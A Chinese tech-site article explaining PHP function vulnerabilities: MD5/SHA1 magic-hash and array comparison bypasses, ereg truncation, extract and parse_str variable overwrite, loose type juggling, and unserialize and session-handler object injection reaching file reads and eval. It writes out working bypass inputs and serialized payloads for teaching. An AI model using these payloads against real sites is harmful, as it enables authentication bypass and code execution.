广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >PHP中有哪些函数漏洞
  • 594
分享到

PHP中有哪些函数漏洞

2023-06-14 18:06:33 594人浏览 泡泡鱼
摘要

这期内容当中小编将会给大家带来有关PHP中有哪些函数漏洞,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。php有什么用php是一个嵌套的缩写名称,是英文超级文本预处理语言,它的语法混合了C、Java、Per

这期内容当中小编将会给大家带来有关PHP中有哪些函数漏洞,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

php有什么用

php是一个嵌套的缩写名称,是英文超级文本预处理语言,它的语法混合了C、Java、Perl以及php自创新的语法,主要用来做网站开发,许多小型网站都用php开发,因为php是开源的,从而使得php经久不衰。

1.MD5 compare漏洞

PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
常见的payload有

0x01 md5(str)    QNKCDZO    240610708    s878926199a    s155964671a    s214587387a    s214587387a     sha1(str)    sha1('aaroZmOk')      sha1('aaK1STfY')    sha1('aaO8zKZF')    sha1('aa3OFF9m')0x02 md5(md5(str)."SALT")    2

同时MD5不能处理数组,若有以下判断则可用数组绕过

if(@md5($_GET['a']) == @md5($_GET['b'])){    echo "yes";}//Http://127.0.0.1/1.php?a[]=1&b[]=2

2.ereg函数漏洞:00截断

ereg ("^[a-zA-Z0-9]+$", $_GET['passWord']) === FALSE

字符串对比解析
在这里如果 $_GET[‘password']为数组,则返回值为NULL
如果为123 || asd || 12as || 123%00&&&**,则返回值为true
其余为false

3.变量本身的key

说到变量的提交很多人只是看到了GET/POST/COOKIE等提交的变量的值,但是忘记了有的程序把变量本身的key也当变量提取给函数处理。

<?php//key.php?aaaa'aaa=1&bb'b=2 //print_R($_GET);  foreach ($_GET AS $key => $value){        print $key."\n";}?>

4.变量覆盖

extract()这个函数在指定参数为EXTR_OVERWRITE或者没有指定函数可以导致变量覆盖

<?php      $auth = '0';      // 这里可以覆盖$auth的变量值    extract($_GET);     if($auth == 1){          echo "private!";      } else{          echo "public!";      }  ?>
<?php  $a='hi';foreach($_GET as $key => $value) {        echo $key;        $$key = $value;}print $a;?>

5.strcmp

如果 str1 小于 str2 返回 < 0; 如果 str1 大于 str2 返回 > 0;如果两者相等,返回 0。
将两个参数先转换成string类型。
以后,当比较数组和字符串的时候,返回是0。
如果参数不是string类型,直接return了

<?php    $password=$_GET['password'];    if (strcmp('xd',$password)) {     echo 'NO!';    } else{        echo 'YES!';    }?>

6.sha1 和 md5 函数

md5 和 sha1 无法处理数组,返回 NULL

if (@sha1([]) ==  false)    echo 1;if (@md5([]) ==  false)    echo 2;echo var_dump(@sha1([]));

7.is_numeric

PHP提供了is_numeric函数,用来变量判断是否为数字。但是函数的范围比较广泛,不仅仅是十进制的数字。

<?phpecho is_numeric(233333);       # 1echo is_numeric('233333');    # 1echo is_numeric(0x233333);    # 1echo is_numeric('0x233333');   # 1echo is_numeric('233333abc');  # 0?>

8.preg_match

如果在进行正则表达式匹配的时候,没有限制字符串的开始和结束(^ 和 $),则可以存在绕过的问题

<?php$ip = '1.1.1.1 abcd'; // 可以绕过if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) {  die('error');} else {   echo('key...');}?>

9.parse_str

与 parse_str() 类似的函数还有 mb_parse_str(),parse_str 将字符串解析成多个变量,如果参数str是URL传递入的查询字符串(query string),则将它解析为变量并设置到当前作用域。

//var.php?var=new  $var='init';  parse_str($_SERVER['QUERY_STRING']);  print $var;

10.字符串比较

== 是弱类型的比较,以下比较都为 true

<?php  echo 0 == 'a' ;// a 转换为数字为 0    重点注意// 0x 开头会被当成16进制54975581388的16进制为 0xccccccccc// 十六进制与整数,被转换为同一进制比较'0xccccccccc' == '54975581388' ;// 字符串在与数字比较前会自动转换为数字,如果不能转换为数字会变成01 == '1';1 == '01';10 == '1e1';'100' == '1e2' ;    // 十六进制数与带空格十六进制数,被转换为十六进制整数'0xABCdef'  == '     0xABCdef';echo '0010e2' == '1e3';// 0e 开头会被当成数字,又是等于 0*10^xxx=0// 如果 md5 是以 0e 开头,在做比较的时候,可以用这种方法绕过'0e509367213418206700842008763514' == '0e481036490867661113260034900752';'0e481036490867661113260034900752' == '0' ;var_dump(md5('240610708') == md5('QNKCDZO'));var_dump(md5('aabg7XSs') == md5('aabC9RqS'));var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));?>

11.unset

unset(     bar);用来销毁指定的变量,如果变量  bar 包含在请求参数中,可能出现销毁一些变量而实现程序逻辑绕过。

<?php  // http://127.0.0.1/index.php?_CONFIG=123$_CONFIG['extraSecure'] = true;foreach(array('_GET','_POST') as $method) {    foreach($$method as $key=>$value) {      // $key == _CONFIG      // $$key == $_CONFIG      // 这个函数会把 $_CONFIG 变量销毁      unset($$key);    }}if ($_CONFIG['extraSecure'] == false) {    echo 'flag {****}';}?>

12.intval()

int转string:

$var = 5;  方式1:$item = (string)$var;  方式2:$item = strval($var);

string转int:intval()函数。

var_dump(intval('2')) //2  var_dump(intval('3abcd')) //3  var_dump(intval('abcd')) //0

说明intval()转换的时候,会将从字符串的开始进行转换知道遇到一个非数字的字符。即使出现无法转换的字符串,intval()不会报错而是返回0。
利用代码:

<?php  $a = '10000 uNIOn select * from yz';if(intval($a)>1000)       echo $a ;?>

13.switch()

如果switch是数字类型的case的判断时,switch会将其中的参数转换为int类型。如下:

<?php$i ="2abc";  switch ($i) {  case 0:  case 1:  case 2:  echo "i is less than 3 but not negative";  break;  case 3:  echo "i is 3";  } ?>

这个时候程序输出的是i is less than 3 but not negative,是由于switch()函数将$i进行了类型转换,转换结果为2。

14.in_array()

$array=[0,1,2,'3'];  var_dump(in_array('abc', $array)); //true  var_dump(in_array('1bc', $array)); //true

可以看到上面的情况返回的都是true,因为'abc'会转换为0,'1bc'转换为1。
在所有php认为是int的地方输入string,都会被强制转换

15.serialize 和 unserialize漏洞

魔术方法

这里我们先简单介绍一下php中的魔术方法(这里如果对于类、对象、方法不熟的先去学学吧),即Magic方法,php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct,__toString,__sleep,__wakeup等等。这些函数都会在某些特殊时候被自动调用。
例如__construct()方法会在一个对象被创建时自动调用,对应的__destruct则会在一个对象被销毁时调用等等。
这里有两个比较特别的Magic方法,__sleep 方法会在一个对象被序列化的时候调用。 __wakeup方法会在一个对象被反序列化的时候调用。

在这里介绍一个序列化漏洞,首先不要相信用户输入的一切
看下面代码

<?phpclass test{    public $username = '';    public $password = '';    public $file = '';    public function out(){        echo "username: ".$this->username."<br>"."password: ".$this->password ;    }     public function __toString() {        return file_get_contents($this->file);    }}$a = new test();$a->file = 'C:\Users\YZ\Desktop\plan.txt';echo serialize($a);?>//tostring方法会在输出实例的时候执行,如果实例路径是隐秘文件就可以读取了

下面就可以读取了C:\Users\YZ\Desktop\plan.txt文件了
echo unserialize触发了__tostring函数

<?phpclass test{    public $username = '';    public $password = '';    public $file = '';    public function out(){        echo "username: ".$this->username."<br>"."password: ".$this->password ;    }     public function __toString() {        return file_get_contents($this->file);    }}$a = 'O:4:"test":3:{s:8:"username";s:0:"";s:8:"password";s:0:"";s:4:"file";s:28:"C:\Users\YZ\Desktop\plan.txt";}';echo unserialize($a);?>

16.session 反序列化漏洞

主要原因是
ini_set(‘session.serialize_handler', ‘php_serialize');
ini_set(‘session.serialize_handler', ‘php');
两者处理session的方式不同

利用下面代码可以生成session值

<?phpini_set('session.serialize_handler', 'php_serialize');//a:1:{s:6:"spoock";s:3:"111";}//ini_set('session.serialize_handler', 'php');//a|s:3:"111"session_start();$_SESSION["spoock"]=$_GET["a"];?>

我们来看看生成的session值

spoock|s:3:"111";    //session键值|内容序列化a:1:{s:6:"spoock";s:3:"111";}a:1:{s:N:session键值;内容序列化}在ini_set('session.serialize_handler', 'php');中把|之前认为是键值后面的视为序列化那么就可以利用这一漏洞执行一些恶意代码

看下面的例子
1.php

<?phpini_set('session.serialize_handler', 'php_serialize');session_start();$_SESSION["spoock"]=$_GET["a"];?>

php

<?php   ini_set('session.serialize_handler', 'php');session_start();class lemon {    var $hi;    function __construct(){        $this->hi = 'phpinfo();';    }    function __destruct() {         eval($this->hi);//这里很危险,可以执行用户输入的参数    }}?>

在1.PHP里面输入a参数序列化的值|O:5:”lemon”:1:{s:2:”hi”;s:10:”phpinfo();”;}
则被序列化为
a:1:{s:6:”spoock”;s:44:”|O:5:”lemon”:1:{s:2:”hi”;s:10:”phpinfo();”;}
在2.PHP里面打开
就可以执行phpinfo()了

上述就是小编为大家分享的PHP中有哪些函数漏洞了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注编程网PHP编程频道。

--结束END--

本文标题: PHP中有哪些函数漏洞

本文链接: https://www.lsjlt.com/news/274153.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • PHP中有哪些函数漏洞
    这期内容当中小编将会给大家带来有关PHP中有哪些函数漏洞,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。php有什么用php是一个嵌套的缩写名称,是英文超级文本预处理语言,它的语法混合了C、Java、Per...
    99+
    2023-06-14
  • PHP常见函数漏洞
    目录 前言: 1、intval(): 一些特性: 2、__wakeup() : 3、strcmp() : 4、assert(): 5、eval(): 6、include(): 7、readfile(): 8、call_user_func()...
    99+
    2023-09-03
    php bug 开发语言 web安全
  • PHP常见漏洞代码有哪些
    本篇内容介绍了“PHP常见漏洞代码有哪些”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!PHP 文件上传漏洞只验证MIME类型: 代码中验证了...
    99+
    2023-07-05
  • PHP漏洞产生的原因有哪些
    PHP漏洞产生的原因主要有以下几个:1. 编码错误:在编写PHP代码时,由于疏忽或错误的使用函数、变量等,可能导致漏洞的产生。比如未...
    99+
    2023-08-19
    PHP
  • 详解各种PHP函数漏洞
    目录1.MD5 compare漏洞2.ereg函数漏洞:00截断3.变量本身的key4.变量覆盖5.strcmp6.sha1 和 md5 函数7.is_numeric8.preg_m...
    99+
    2022-11-12
  • 网站漏洞都有哪些
    网站漏洞都有:信息泄露漏洞,它是因Web服务器或应用程序没有正确处理一些特殊请求,从而导致泄露Web服务器的一些敏感信息。目录遍历漏洞,它是攻击者向Web服务器发送请求,通过在URL中或在有特殊意义的目录中附加“../”、或者附加“../”...
    99+
    2022-10-11
  • xss漏洞攻击有哪些
    xss漏洞攻击有:盗用cookie,获取敏感信息。利用植入Flash,通过crossdomain权限设置进一步获取更高权限。利用iframe、frame、XMLHttpRequest等方式,以被攻击用户的身份执行一些管理动作。利用可被攻击的...
    99+
    2022-10-18
  • web高危漏洞有哪些
    web高危漏洞有以下常见的几种SQL注入漏洞SQL注入漏洞是web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句。弱口令漏洞当网站用户帐号存在...
    99+
    2022-10-13
  • ubuntu高危漏洞有哪些
    ubuntu高危漏洞有以下常见的几种sql注入漏洞 SQL注入攻击是黑客对数据库进行攻击的常用手段之一,当没有对用户输入数据的合法性进行判断时,攻击者可以提交一段数据库查询代码,根据程序返回的结果,就可以获取私密数据。缓冲区溢出漏洞缓冲区溢...
    99+
    2022-10-20
  • PHP网站常见安全漏洞有哪些
    这篇“PHP网站常见安全漏洞有哪些”文章,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要参考一下,对于“PHP网站常见安全漏洞有哪些”,小编整理了以下知识点,请大家跟着小编的步伐一步一步的慢慢理解,接下来就让我们进入...
    99+
    2023-06-06
  • PHP文件包含哪些漏洞
    这篇文章主要介绍了PHP文件包含哪些漏洞的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇PHP文件包含哪些漏洞文章都会有所收获,下面我们一起来看看吧。漏洞描述文件包含漏洞的产生原因是在通过PHP的函数引入文件时,...
    99+
    2023-06-30
  • 云服务器漏洞有哪些
    云服务器的漏洞可能是由多种因素引起的,包括但不限于: 内存泄漏:如果云服务器的某个组件(例如Web服务器)受到了攻击,该组件就会泄漏内存数据,从而导致攻击者可以访问受害者的文件和数据。 安全漏洞:云服务器系统通常都是安全的,但是也不排除...
    99+
    2023-10-27
    漏洞 服务器 有哪些
  • jquery的安全漏洞有哪些
    这篇“jquery的安全漏洞有哪些”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面我们一起来看看这篇“jquer...
    99+
    2022-10-19
  • 网站高危漏洞有哪些
    网站高危漏洞有:SQL注入漏洞:网站程序没有对输入字符串中包含的SQL语句进行检查,使得包含的SQL语句被数据库误认为是合法的SQL指令而运行,导致数据库中各种敏感数据被盗取、更改或删除。XSS跨站脚本漏洞:网站程序忽略了对输入字符串中特殊...
    99+
    2022-10-20
  • 网站安全漏洞有哪些
    网站安全漏洞有:SQL注入漏洞:网站程序没有对输入字符串中包含的SQL语句进行检查,使得包含的SQL语句被数据库误认为是合法的SQL指令而运行,导致数据库中各种敏感数据被盗取、更改或删除。XSS跨站脚本漏洞:网站程序忽略了对输入字符串中特殊...
    99+
    2022-10-09
  • 系统漏洞有哪些类型
    系统漏洞有以下几种常见的类型sql注入漏洞 sql注入漏洞是黑客对数据库进行攻击的常用手段之一,当没有对用户输入数据的合法性进行判断时,攻击者可以提交一段数据库查询代码,根据程序返回的结果,就可以获取私密数据。跨站脚本漏洞跨站脚本攻击一般在...
    99+
    2022-10-13
  • 网站代码漏洞有哪些
    网站代码漏洞有注入漏洞、XSS跨站脚本漏洞等。常见的注入漏洞包括SQL、LDAP、OS命令、ORM和OGNL等,用户可以通过任何输入点输入构建的恶意代码,如果应用程序没有严格过滤用户的输入数据,一旦输入的恶意代码作为命令或查询的一部分被发送...
    99+
    2022-10-22
  • 文件上传漏洞php相关函数
    file_exists(path) 检查文件或目录是否存在。 参数描述path必需。规定要检查的路径。 如果指定的文件或目录存在则返回 TRUE,否则返回 FALSE move_uploaded_file(file,newloc) 把上传...
    99+
    2023-09-03
    php web安全
  • web漏洞扫描工具有哪些
    常用的web漏洞扫描工具有:1. Acunetix2. Burp Suite3. Nikto4. OpenVAS5. Nessus6...
    99+
    2023-06-08
    web漏洞扫描工具
  • ssl加密方式有哪些漏洞
    使用SSL加密过程中,可能会存在以下漏洞:1、弱安全程序漏洞使用弱的加密算法或者不正确的安全配置,可能会造成信息泄漏。2、Race ...
    99+
    2023-03-06
    ssl加密方式 ssl
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作